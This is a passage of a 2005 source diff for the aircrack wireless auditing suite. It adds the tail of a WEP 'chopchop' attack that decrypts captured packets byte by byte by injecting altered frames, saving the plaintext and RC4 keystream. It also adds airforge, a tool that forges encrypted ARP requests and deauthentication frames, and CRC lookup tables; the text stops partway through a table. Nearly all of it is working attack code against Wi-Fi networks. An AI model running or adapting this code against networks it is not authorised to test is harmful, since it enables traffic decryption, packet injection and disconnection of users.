1278 + ticks[3]++; /* ticks since started chopping current byte */
1280 + /* update the status line */
1282 + if( ticks[1] == 400 )
1285 + printf( "\rSent %3ld packets, current guess: %02X...\33[K",
1286 + nb_pkt_sent, guess );
1290 + if( data_end == 40 && ticks[3] > 8 * ( ticks[0] - ticks[3] ) /
1291 + (int) ( pkh.caplen - ( data_end - 1 ) ) )
1293 + printf( "\n\nThe AP appears to drop packets shorter "
1294 + "than 40 bytes.\n" );
1298 + z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
1300 + if( ( chopped[data_end + 0] ^ savebuf[data_end + 0] ) == 0x06 &&
1301 + ( chopped[data_end + 1] ^ savebuf[data_end + 1] ) == 0x04 &&
1302 + ( chopped[data_end + 2] ^ savebuf[data_end + 2] ) == 0x00 )
1304 - tm_prev = time( NULL );
1305 - printf( "\r\33[1KSent %ld packets\r", cnt1 );
1307 + printf( "Enabling standard workaround: "
1308 + "ARP header re-creation.\n" );
1310 + chopped[z + 10] = savebuf[z + 10] ^ 0x08;
1311 + chopped[z + 11] = savebuf[z + 11] ^ 0x06;
1312 + chopped[z + 12] = savebuf[z + 12] ^ 0x00;
1313 + chopped[z + 13] = savebuf[z + 13] ^ 0x01;
1314 + chopped[z + 14] = savebuf[z + 14] ^ 0x08;
1315 + chopped[z + 15] = savebuf[z + 15] ^ 0x00;
1319 + printf( "Enabling standard workaround: "
1320 + " IP header re-creation.\n" );
1322 + n = pkh.caplen - ( z + 16 );
1324 - n = arp_packets[i].length;
1325 + chopped[z + 4] = savebuf[z + 4] ^ 0xAA;
1326 + chopped[z + 5] = savebuf[z + 5] ^ 0xAA;
1327 + chopped[z + 6] = savebuf[z + 6] ^ 0x03;
1328 + chopped[z + 7] = savebuf[z + 7] ^ 0x00;
1329 + chopped[z + 8] = savebuf[z + 8] ^ 0x00;
1330 + chopped[z + 9] = savebuf[z + 9] ^ 0x00;
1331 + chopped[z + 10] = savebuf[z + 10] ^ 0x08;
1332 + chopped[z + 11] = savebuf[z + 11] ^ 0x00;
1333 + chopped[z + 14] = savebuf[z + 14] ^ ( n >> 8 );
1334 + chopped[z + 15] = savebuf[z + 15] ^ ( n & 0xFF );
1336 + memcpy( buffer, savebuf, pkh.caplen );
1338 + for( i = z + 4; i < (int) pkh.caplen; i++ )
1339 + h80211[i - 4] = h80211[i] ^ chopped[i];
1341 + /* sometimes the header length or the tos field vary */
1343 + for( i = 0; i < 16; i++ )
1345 + h80211[z + 8] = 0x40 + i;
1346 + chopped[z + 12] = savebuf[z + 12] ^ ( 0x40 + i );
1348 + for( j = 0; j < 256; j++ )
1350 + h80211[z + 9] = j;
1351 + chopped[z + 13] = savebuf[z + 13] ^ j;
1353 + if( check_crc_buf( h80211 + z, pkh.caplen - z - 8 ) )
1354 + goto have_crc_match;
1358 - if( write( raw_sock, arp_packets[i].data, n ) != n )
1359 + printf( "This doesn't look like an IP packet, "
1360 + "try another one.\n" );
1368 + if( ( ticks[2] * opt.nbpps ) / 4096 > 0 )
1370 + /* send one modified frame */
1374 + memcpy( buffer, chopped, data_end - 1 );
1376 + /* note: guess 256 is special, it tests if the *
1377 + * AP properly drops frames with an invalid ICV *
1378 + * so this guess always has its bit 8 set to 0 */
1380 + if( is_deauth_mode )
1382 - perror( "write" );
1383 + opt.r_smac[1] |= ( guess < 256 );
1384 + opt.r_smac[5] = guess & 0xFF;
1388 + opt.r_dmac[1] |= ( guess < 256 );
1389 + opt.r_dmac[5] = guess & 0xFF;
1392 + memcpy( buffer + 10, opt.r_smac, 6 );
1393 + memcpy( buffer + 16, opt.r_dmac, 6 );
1397 + buffer[data_end - 2] ^= crc_chop_tbl[guess][3];
1398 + buffer[data_end - 3] ^= crc_chop_tbl[guess][2];
1399 + buffer[data_end - 4] ^= crc_chop_tbl[guess][1];
1400 + buffer[data_end - 5] ^= crc_chop_tbl[guess][0];
1403 + if( send_frame( fd_out, buffer, data_end -1 ) != 0 )
1405 + if( errno != EAGAIN )
1407 + perror( "write" );
1414 + if( ++guess > 256 ) guess = 0;
1418 + /* watch for a response from the AP */
1420 + memset( buffer, 0, 2048 );
1422 + if( ( caplen = read( fd_in, buffer,
1423 + sizeof( buffer ) ) ) < 0 )
1425 + if( errno == EAGAIN ) continue;
1430 + /* if device is an atheros, remove the FCS */
1432 + if( memcmp( argv[argc - 1], "ath", 3 ) == 0 )
1437 + /* skip the prism header if present */
1441 + if( arptype_in == ARPHRD_IEEE80211_PRISM )
1443 + n = *(int *)( buffer + 4 );
1445 + if( n < 8 || n >= (int) caplen )
1452 + /* check if it's a deauthentication packet */
1454 + if( h80211[0] == 0xC0 )
1456 + if( memcmp( h80211 + 4, opt.r_smac, 6 ) == 0 &&
1457 + ! is_deauth_mode )
1459 + printf( "\rThe client's source MAC you have specified "
1460 + "does not appear to\nbe authenticated (got a "
1461 + "deauthentication packet from the AP).\n\n" );
1465 + if( h80211[4] != opt.r_smac[0] ) continue;
1466 + if( h80211[6] != opt.r_smac[2] ) continue;
1467 + if( h80211[7] != opt.r_smac[3] ) continue;
1468 + if( h80211[8] != opt.r_smac[4] ) continue;
1470 + if( ( h80211[5] & 0xFE ) !=
1471 + ( opt.r_smac[1] & 0xFE ) ) continue;
1473 + if( ! ( h80211[5] & 1 ) )
1475 + printf( "\rThe Access Point does not appear to properly "
1476 + "discard frames with an\ninvalid ICV - try running "
1477 + "aireplay in authenticated mode (-h) instead.\n\n" );
1483 + if( is_deauth_mode )
1486 + /* check if it's a WEP data packet */
1488 + if( ( h80211[0] & 0x0C ) != 8 ) continue;
1489 + if( ( h80211[0] & 0xF0 ) != 0 ) continue;
1490 + if( ( h80211[1] & 0x03 ) != 2 ) continue;
1491 + if( ( h80211[1] & 0x40 ) == 0 ) continue;
1493 + /* check the extended IV (TKIP) flag */
1495 + z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
1497 + if( ( h80211[z + 3] & 0x20 ) != 0 ) continue;
1499 + /* check the destination address */
1501 + if( h80211[4] != opt.r_dmac[0] ) continue;
1502 + if( h80211[6] != opt.r_dmac[2] ) continue;
1503 + if( h80211[7] != opt.r_dmac[3] ) continue;
1504 + if( h80211[8] != opt.r_dmac[4] ) continue;
1506 + if( ( h80211[5] & 0xFE ) !=
1507 + ( opt.r_dmac[1] & 0xFE ) ) continue;
1509 + if( ! ( h80211[5] & 1 ) )
1511 + printf( "\nThe Access Point does not appear to properly "
1512 + "discard frames with an\ninvalid ICV - try running "
1513 + "aireplay in non-authenticated mode instead.\n\n" );
1518 + /* we have a winner */
1520 + guess = h80211[9];
1522 + chopped[data_end - 1] ^= guess;
1523 + chopped[data_end - 2] ^= crc_chop_tbl[guess][3];
1524 + chopped[data_end - 3] ^= crc_chop_tbl[guess][2];
1525 + chopped[data_end - 4] ^= crc_chop_tbl[guess][1];
1526 + chopped[data_end - 5] ^= crc_chop_tbl[guess][0];
1528 + n = pkh.caplen - data_start;
1531 + printf( "\rOffset %4d (%2d%% done) | xor = %02X | pt = %02X | "
1532 + "%4ld frames written in %5ldms\n", data_end - 1,
1533 + 100 * ( pkh.caplen - data_end ) / n,
1534 + chopped[data_end - 1],
1535 + chopped[data_end - 1] ^ savebuf[data_end - 1],
1536 + nb_pkt_sent, ( 1000 * ticks[3] ) / 4096 );
1538 + nb_pkt_sent = ticks[3] = 0;
1542 + if( is_deauth_mode )
1544 + opt.r_smac[1] = rand() & 0x3E;
1545 + opt.r_smac[2] = rand() & 0xFF;
1546 + opt.r_smac[3] = rand() & 0xFF;
1547 + opt.r_smac[4] = rand() & 0xFF;
1551 + opt.r_dmac[1] = rand() & 0xFE;
1552 + opt.r_dmac[2] = rand() & 0xFF;
1553 + opt.r_dmac[3] = rand() & 0xFF;
1554 + opt.r_dmac[4] = rand() & 0xFF;
1562 - printf( "\r\33[1KSent %ld packets.\n", cnt1 );
1563 + /* reveal the plaintext (chopped contains the prga) */
1567 + z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
1569 + chopped[z + 4] = savebuf[z + 4] ^ 0xAA;
1570 + chopped[z + 5] = savebuf[z + 5] ^ 0xAA;
1571 + chopped[z + 6] = savebuf[z + 6] ^ 0x03;
1572 + chopped[z + 7] = savebuf[z + 7] ^ 0x00;
1573 + chopped[z + 8] = savebuf[z + 8] ^ 0x00;
1574 + chopped[z + 9] = savebuf[z + 9] ^ 0x00;
1576 + for( i = z + 4; i < (int) pkh.caplen; i++ )
1577 + h80211[i - 4] = h80211[i] ^ chopped[i];
1579 + if( ! check_crc_buf( h80211 + z, pkh.caplen - z - 8 ) )
1580 + printf( "\nWarning: ICV checksum verification FAILED!\n" );
1582 + pkh.caplen -= 4 + 4; /* remove the WEP IV & CRC (ICV) */
1585 + h80211[1] &= 0xBF; /* remove the WEP bit, too */
1587 + /* save the decrypted packet */
1589 + sprintf( tmp_str, "replay_dec-%02d%02d%02d-%02d%02d%02d.cap",
1590 + lt->tm_year - 100, 1 + lt->tm_mon, lt->tm_mday,
1591 + lt->tm_hour, lt->tm_min, lt->tm_sec );
1593 + printf( "\nSaving plaintext in %s\n", tmp_str );
1595 + if( ( f_cap_out = fopen( tmp_str, "wb+" ) ) == NULL )
1597 + perror( "fopen(output pcap,wb+)" );
1601 + n = sizeof( struct pcap_file_header );
1603 + if( fwrite( &pfh, 1, n, f_cap_out ) != (size_t) n )
1605 + perror( "fwrite(pcap file header)" );
1609 + n = sizeof( pkh );
1611 + if( fwrite( &pkh, 1, n, f_cap_out ) != (size_t) n )
1613 + perror( "fwrite(packet header)" );
1619 + if( fwrite( h80211, 1, n, f_cap_out ) != (size_t) n )
1621 + perror( "fwrite(packet data)" );
1625 + /* save the RC4 xor mask (prga) */
1627 + sprintf( tmp_str, "replay_dec-%02d%02d%02d-%02d%02d%02d.xor",
1628 + lt->tm_year - 100, 1 + lt->tm_mon, lt->tm_mday,
1629 + lt->tm_hour, lt->tm_min, lt->tm_sec );
1631 + printf( "Saving keystream in %s\n", tmp_str );
1633 + if( ( f_cap_out = fopen( tmp_str, "wb+" ) ) == NULL )
1635 + perror( "fopen(output prga,wb+)" );
1639 + n = pkh.caplen + 8 - z;
1641 + if( fwrite( chopped + z, 1, n, f_cap_out ) != (size_t) n )
1643 + perror( "fwrite(prga data)" );
1647 + printf( "\nCompleted in %lds (%0.2f bytes/s)\n\n",
1648 + time( NULL ) - tt,
1649 + (float) ( pkh.caplen - 6 - z ) /
1650 + (float) ( time( NULL ) - tt ) );
1652 + /* that's all, folks */
1656 diff -urN aircrack-2.1.orig/airforge.c aircrack-2.1/airforge.c
1657 --- aircrack-2.1.orig/airforge.c 1970-01-01 01:00:00.000000000 +0100
1658 +++ aircrack-2.1/airforge.c 2005-04-22 08:51:21.933064968 +0200
1661 + * 802.11 ARP-request & deauthentication frame forgery
1663 + * Copyright (C) 2005 Christophe Devine
1665 + * This program is free software; you can redistribute it and/or modify
1666 + * it under the terms of the GNU General Public License as published by
1667 + * the Free Software Foundation; either version 2 of the License, or
1668 + * (at your option) any later version.
1670 + * This program is distributed in the hope that it will be useful,
1671 + * but WITHOUT ANY WARRANTY; without even the implied warranty of
1672 + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
1673 + * GNU General Public License for more details.
1675 + * You should have received a copy of the GNU General Public License
1676 + * along with this program; if not, write to the Free Software
1677 + * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
1680 +#include <arpa/inet.h>
1681 +#include <string.h>
1682 +#include <stdlib.h>
1685 +#include "pcap-aireplay.h"
1686 +#include "crctable.h"
1689 + "\x08\x40\x02\x01\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC" \
1690 + "\xFF\xFF\xFF\xFF\xFF\xFF\x80\x01\x55\x55\x55\x55\xAA\xAA\x03\x00" \
1691 + "\x00\x00\x08\x06\x00\x01\x08\x00\x06\x04\x00\x01\xCC\xCC\xCC\xCC" \
1692 + "\xCC\xCC\x11\x11\x11\x11\x00\x00\x00\x00\x00\x00\x22\x22\x22\x22" \
1693 + "\x00\x00\x00\x00"
1695 +#define DEAUTH_REQ \
1696 + "\xC0\x00\x02\x01\xCC\xCC\xCC\xCC\xCC\xCC\xBB\xBB\xBB\xBB\xBB\xBB" \
1697 + "\xBB\xBB\xBB\xBB\xBB\xBB\x00\x00\x07\x00"
1702 +" airforge 2.2 - (C) 2005 Christophe Devine\n"
1704 +" usage 1: arp-request forgery\n"
1706 +" arpforge <prga file> <type> <bssid> <mac src>\n"
1707 +" <ip src> <ip dst> <output filename>\n"
1709 +" usage 2: deauthentication frame forgery\n"
1711 +" arpforge <bssid> <dst mac> <output filename>\n"
1714 +int getmac( char *s, unsigned char *mac )
1718 + while( sscanf( s, "%x", &n ) == 1 )
1720 + if( n < 0 || n > 255 )
1725 + if( ++i == 6 ) break;
1727 + if( ! ( s = strchr( s, ':' ) ) )
1736 +int main( int argc, char *argv[] )
1739 + unsigned long int crc;
1740 + FILE *f_prga, *f_cap_out;
1742 + unsigned char h80211[128];
1743 + unsigned char bssid[6];
1744 + unsigned char saddr[6];
1745 + unsigned char daddr[6];
1746 + unsigned char ipsrc[4];
1747 + unsigned char ipdst[4];
1748 + unsigned char prga[44];
1750 + struct pcap_file_header pfh;
1751 + struct pcap_pkthdr pkh;
1752 + struct timeval tv;
1755 + goto forge_deauth;
1763 + if( ( f_prga = fopen( argv[1], "rb" ) ) == NULL )
1765 + perror( "fopen(input prga,rb)" );
1769 + memcpy( h80211, ARP_REQ, pkh.caplen = 68 );
1771 + n = atoi( argv[2] );
1773 + if( n != 1 && n != 2 )
1775 + fprintf( stderr, "Invalid type: must be 1 "
1776 + "(ToDS) or 2 (FromDS).\n" );
1782 + if( getmac( argv[3], bssid ) != 0 )
1784 + fprintf( stderr, "Invalid BSSID.\n" );
1788 + if( getmac( argv[4], saddr ) != 0 )
1790 + fprintf( stderr, "Invalid source MAC.\n" );
1794 + memcpy( daddr, "\xFF\xFF\xFF\xFF\xFF\xFF", 6 );
1796 + if( ! inet_aton( argv[5], (struct in_addr *) ipsrc ) )
1798 + fprintf( stderr, "Invalid source IP.\n" );
1802 + if( ! inet_aton( argv[6], (struct in_addr *) ipdst ) )
1804 + fprintf( stderr, "Invalid destination IP.\n" );
1810 + memcpy( h80211 + 4, bssid, 6 );
1811 + memcpy( h80211 + 10, saddr, 6 );
1812 + memcpy( h80211 + 16, daddr, 6 );
1817 + memcpy( h80211 + 10, bssid, 6 );
1818 + memcpy( h80211 + 16, saddr, 6 );
1819 + memcpy( h80211 + 4, daddr, 6 );
1822 + memcpy( h80211 + 44, saddr, 6 );
1823 + memcpy( h80211 + 50, ipsrc, 4 );
1824 + memcpy( h80211 + 60, ipdst, 4 );
1826 + /* XXX: this source code lacks comments */
1830 + for( n = 28; n < 64; n++ )
1831 + crc = crc_tbl[(crc ^ h80211[n]) & 0xFF] ^ (crc >> 8);
1835 + h80211[64] = (crc ) & 0xFF;
1836 + h80211[65] = (crc >> 8) & 0xFF;
1837 + h80211[66] = (crc >> 16) & 0xFF;
1838 + h80211[67] = (crc >> 24) & 0xFF;
1840 + if( fread( prga, 44, 1, f_prga ) != 1 )
1842 + fprintf( stderr, "fread(44 bytes) failed - prga too short ?\n" );
1846 + memcpy( h80211 + 24, prga, 4 );
1848 + for( n = 28; n < 68; n++ )
1849 + h80211[n] ^= prga[n - 24];
1853 + goto write_packet;
1857 + memcpy( h80211, DEAUTH_REQ, pkh.caplen = 26 );
1859 + if( getmac( argv[1], bssid ) != 0 )
1861 + fprintf( stderr, "Invalid BSSID.\n" );
1865 + if( getmac( argv[2], daddr ) != 0 )
1867 + fprintf( stderr, "Invalid destination MAC.\n" );
1871 + memcpy( h80211 + 4, daddr, 6 );
1872 + memcpy( h80211 + 10, bssid, 6 );
1873 + memcpy( h80211 + 16, bssid, 6 );
1879 + if( ( f_cap_out = fopen( argv[n], "wb+" ) ) == NULL )
1881 + fprintf( stderr, "failed: fopen(%s,wb+)\n", argv[7] );
1885 + pfh.magic = TCPDUMP_MAGIC;
1886 + pfh.version_major = PCAP_VERSION_MAJOR;
1887 + pfh.version_minor = PCAP_VERSION_MINOR;
1890 + pfh.snaplen = 65535;
1891 + pfh.linktype = LINKTYPE_IEEE802_11;
1893 + n = sizeof( struct pcap_file_header );
1895 + if( fwrite( &pfh, 1, n, f_cap_out ) != (size_t) n )
1897 + fprintf( stderr, "failed: fwrite(pcap file header)\n" );
1901 + gettimeofday( &tv, NULL );
1903 + pkh.tv_sec = tv.tv_sec;
1904 + pkh.tv_usec = tv.tv_usec;
1905 + pkh.len = pkh.caplen;
1907 + n = sizeof( pkh );
1909 + if( fwrite( &pkh, 1, n, f_cap_out ) != (size_t) n )
1911 + fprintf( stderr, "fwrite(packet header) failed\n" );
1917 + if( fwrite( h80211, 1, n, f_cap_out ) != (size_t) n )
1919 + fprintf( stderr, "fwrite(packet data) failed\n" );
1923 + printf( "Done.\n" );
1927 diff -urN aircrack-2.1.orig/crctable.h aircrack-2.1/crctable.h
1928 --- aircrack-2.1.orig/crctable.h 1970-01-01 01:00:00.000000000 +0100
1929 +++ aircrack-2.1/crctable.h 2005-04-22 08:51:21.934064816 +0200
1931 +#ifndef _CRCTABLE_H
1932 +#define _CRCTABLE_H
1934 +const unsigned long int crc_tbl[256] =
1936 + 0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419, 0x706AF48F, 0xE963A535, 0x9E6495A3,
1937 + 0x0EDB8832, 0x79DCB8A4, 0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07, 0x90BF1D91,
1938 + 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE, 0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7,
1939 + 0x136C9856, 0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9, 0xFA0F3D63, 0x8D080DF5,
1940 + 0x3B6E20C8, 0x4C69105E, 0xD56041E4, 0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,
1941 + 0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3, 0x45DF5C75, 0xDCD60DCF, 0xABD13D59,
1942 + 0x26D930AC, 0x51DE003A, 0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599, 0xB8BDA50F,
1943 + 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924, 0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D,
1944 + 0x76DC4190, 0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F, 0x9FBFE4A5, 0xE8B8D433,
1945 + 0x7807C9A2, 0x0F00F934, 0x9609A88E, 0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01,
1946 + 0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED, 0x1B01A57B, 0x8208F4C1, 0xF50FC457,
1947 + 0x65B0D9C6, 0x12B7E950, 0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3, 0xFBD44C65,
1948 + 0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2, 0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB,
1949 + 0x4369E96A, 0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5, 0xAA0A4C5F, 0xDD0D7CC9,
1950 + 0x5005713C, 0x270241AA, 0xBE0B1010, 0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,
1951 + 0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17, 0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD,
1952 + 0xEDB88320, 0x9ABFB3B6, 0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615, 0x73DC1683,
1953 + 0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8, 0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1,
1954 + 0xF00F9344, 0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB, 0x196C3671, 0x6E6B06E7,
1955 + 0xFED41B76, 0x89D32BE0, 0x10DA7A5A, 0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5,
1956 + 0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1, 0xA6BC5767, 0x3FB506DD, 0x48B2364B,
1957 + 0xD80D2BDA, 0xAF0A1B4C, 0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF, 0x4669BE79,
1958 + 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236, 0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F,
1959 + 0xC5BA3BBE, 0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31, 0x2CD99E8B, 0x5BDEAE1D,
1960 + 0x9B64C2B0, 0xEC63F226, 0x756AA39C, 0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713,
1961 + 0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B, 0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21,
1962 + 0x86D3D2D4, 0xF1D4E242, 0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1, 0x18B74777,
1963 + 0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C, 0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45,
1964 + 0xA00AE278, 0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7, 0x4969474D, 0x3E6E77DB,
1965 + 0xAED16A4A, 0xD9D65ADC, 0x40DF0B66, 0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,
1966 + 0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605, 0xCDD70693, 0x54DE5729, 0x23D967BF,
1967 + 0xB3667A2E, 0xC4614AB8, 0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B, 0x2D02EF8D
1970 +const unsigned char crc_chop_tbl[256][4] =
1972 + { 0x26,0x70,0x6A,0x0F }, { 0x67,0x76,0x1B,0xD4 }, { 0xE5,0x7A,0xF9,0x62 }, { 0xA4,0x7C,0x88,0xB9 },
1973 + { 0xA0,0x65,0x4C,0xD4 }, { 0xE1,0x63,0x3D,0x0F }, { 0x63,0x6F,0xDF,0xB9 }, { 0x22,0x69,0xAE,0x62 },
1974 + { 0x6B,0x5D,0x57,0x62 }, { 0x2A,0x5B,0x26,0xB9 }, { 0xA8,0x57,0xC4,0x0F }, { 0xE9,0x51,0xB5,0xD4 },
1975 + { 0xED,0x48,0x71,0xB9 }, { 0xAC,0x4E,0x00,0x62 }, { 0x2E,0x42,0xE2,0xD4 }, { 0x6F,0x44,0x93,0x0F },
1976 + { 0xBC,0x2A,0x10,0xD5 }, { 0xFD,0x2C,0x61,0x0E }, { 0x7F,0x20,0x83,0xB8 }, { 0x3E,0x26,0xF2,0x63 },
1977 + { 0x3A,0x3F,0x36,0x0E }, { 0x7B,0x39,0x47,0xD5 }, { 0xF9,0x35,0xA5,0x63 }, { 0xB8,0x33,0xD4,0xB8 },
1978 + { 0xF1,0x07,0x2D,0xB8 }, { 0xB0,0x01,0x5C,0x63 }, { 0x32,0x0D,0xBE,0xD5 }, { 0x73,0x0B,0xCF,0x0E },
1979 + { 0x77,0x12,0x0B,0x63 }, { 0x36,0x14,0x7A,0xB8 }, { 0xB4,0x18,0x98,0x0E }, { 0xF5,0x1E,0xE9,0xD5 },
1980 + { 0x53,0xC3,0xEF,0x60 }, { 0x12,0xC5,0x9E,0xBB }, { 0x90,0xC9,0x7C,0x0D }, { 0xD1,0xCF,0x0D,0xD6 },
1981 + { 0xD5,0xD6,0xC9,0xBB }, { 0x94,0xD0,0xB8,0x60 }, { 0x16,0xDC,0x5A,0xD6 }, { 0x57,0xDA,0x2B,0x0D },
1982 + { 0x1E,0xEE,0xD2,0x0D }, { 0x5F,0xE8,0xA3,0xD6 }, { 0xDD,0xE4,0x41,0x60 }, { 0x9C,0xE2,0x30,0xBB },
1983 + { 0x98,0xFB,0xF4,0xD6 }, { 0xD9,0xFD,0x85,0x0D }, { 0x5B,0xF1,0x67,0xBB }, { 0x1A,0xF7,0x16,0x60 },
1984 + { 0xC9,0x99,0x95,0xBA }, { 0x88,0x9F,0xE4,0x61 }, { 0x0A,0x93,0x06,0xD7 }, { 0x4B,0x95,0x77,0x0C },
1985 + { 0x4F,0x8C,0xB3,0x61 }, { 0x0E,0x8A,0xC2,0xBA }, { 0x8C,0x86,0x20,0x0C }, { 0xCD,0x80,0x51,0xD7 },
1986 + { 0x84,0xB4,0xA8,0xD7 }, { 0xC5,0xB2,0xD9,0x0C }, { 0x47,0xBE,0x3B,0xBA }, { 0x06,0xB8,0x4A,0x61 },
1987 + { 0x02,0xA1,0x8E,0x0C }, { 0x43,0xA7,0xFF,0xD7 }, { 0xC1,0xAB,0x1D,0x61 }, { 0x80,0xAD,0x6C,0xBA },
1988 + { 0xCC,0x16,0x61,0xD0 }, { 0x8D,0x10,0x10,0x0B }, { 0x0F,0x1C,0xF2,0xBD }, { 0x4E,0x1A,0x83,0x66 },
1989 + { 0x4A,0x03,0x47,0x0B }, { 0x0B,0x05,0x36,0xD0 }, { 0x89,0x09,0xD4,0x66 }, { 0xC8,0x0F,0xA5,0xBD },
1990 + { 0x81,0x3B,0x5C,0xBD }, { 0xC0,0x3D,0x2D,0x66 }, { 0x42,0x31,0xCF,0xD0 }, { 0x03,0x37,0xBE,0x0B },
1991 + { 0x07,0x2E,0x7A,0x66 }, { 0x46,0x28,0x0B,0xBD }, { 0xC4,0x24,0xE9,0x0B }, { 0x85,0x22,0x98,0xD0 },
1992 + { 0x56,0x4C,0x1B,0x0A }, { 0x17,0x4A,0x6A,0xD1 }, { 0x95,0x46,0x88,0x67 }, { 0xD4,0x40,0xF9,0xBC },
1993 + { 0xD0,0x59,0x3D,0xD1 }, { 0x91,0x5F,0x4C,0x0A }, { 0x13,0x53,0xAE,0xBC }, { 0x52,0x55,0xDF,0x67 },
1994 + { 0x1B,0x61,0x26,0x67 }, { 0x5A,0x67,0x57,0xBC }, { 0xD8,0x6B,0xB5,0x0A }, { 0x99,0x6D,0xC4,0xD1 },
1995 + { 0x9D,0x74,0x00,0xBC }, { 0xDC,0x72,0x71,0x67 }, { 0x5E,0x7E,0x93,0xD1 }, { 0x1F,0x78,0xE2,0x0A },
1996 + { 0xB9,0xA5,0xE4,0xBF }, { 0xF8,0xA3,0x95,0x64 }, { 0x7A,0xAF,0x77,0xD2 }, { 0x3B,0xA9,0x06,0x09 },
1997 + { 0x3F,0xB0,0xC2,0x64 }, { 0x7E,0xB6,0xB3,0xBF }, { 0xFC,0xBA,0x51,0x09 }, { 0xBD,0xBC,0x20,0xD2 },
1998 + { 0xF4,0x88,0xD9,0xD2 }, { 0xB5,0x8E,0xA8,0x09 }, { 0x37,0x82,0x4A,0xBF }, { 0x76,0x84,0x3B,0x64 },
1999 + { 0x72,0x9D,0xFF,0x09 }, { 0x33,0x9B,0x8E,0xD2 }, { 0xB1,0x97,0x6C,0x64 }, { 0xF0,0x91,0x1D,0xBF },
2000 + { 0x23,0xFF,0x9E,0x65 }, { 0x62,0xF9,0xEF,0xBE }, { 0xE0,0xF5,0x0D,0x08 }, { 0xA1,0xF3,0x7C,0xD3 },
2001 + { 0xA5,0xEA,0xB8,0xBE }, { 0xE4,0xEC,0xC9,0x65 }, { 0x66,0xE0,0x2B,0xD3 }, { 0x27,0xE6,0x5A,0x08 },
2002 + { 0x6E,0xD2,0xA3,0x08 }, { 0x2F,0xD4,0xD2,0xD3 }, { 0xAD,0xD8,0x30,0x65 }, { 0xEC,0xDE,0x41,0xBE },
2003 + { 0xE8,0xC7,0x85,0xD3 }, { 0xA9,0xC1,0xF4,0x08 }, { 0x2B,0xCD,0x16,0xBE }, { 0x6A,0xCB,0x67,0x65 },
2004 + { 0xB3,0xBB,0x0D,0x6A }, { 0xF2,0xBD,0x7C,0xB1 }, { 0x70,0xB1,0x9E,0x07 }, { 0x31,0xB7,0xEF,0xDC },
2005 + { 0x35,0xAE,0x2B,0xB1 }, { 0x74,0xA8,0x5A,0x6A }, { 0xF6,0xA4,0xB8,0xDC }, { 0xB7,0xA2,0xC9,0x07 },
2006 + { 0xFE,0x96,0x30,0x07 }, { 0xBF,0x90,0x41,0xDC }, { 0x3D,0x9C,0xA3,0x6A }, { 0x7C,0x9A,0xD2,0xB1 },
2007 + { 0x78,0x83,0x16,0xDC }, { 0x39,0x85,0x67,0x07 }, { 0xBB,0x89,0x85,0xB1 }, { 0xFA,0x8F,0xF4,0x6A },
2008 + { 0x29,0xE1,0x77,0xB0 }, { 0x68,0xE7,0x06,0x6B }, { 0xEA,0xEB,0xE4,0xDD }, { 0xAB,0xED,0x95,0x06 },
2009 + { 0xAF,0xF4,0x51,0x6B }, { 0xEE,0xF2,0x20,0xB0 }, { 0x6C,0xFE,0xC2,0x06 }, { 0x2D,0xF8,0xB3,0xDD },
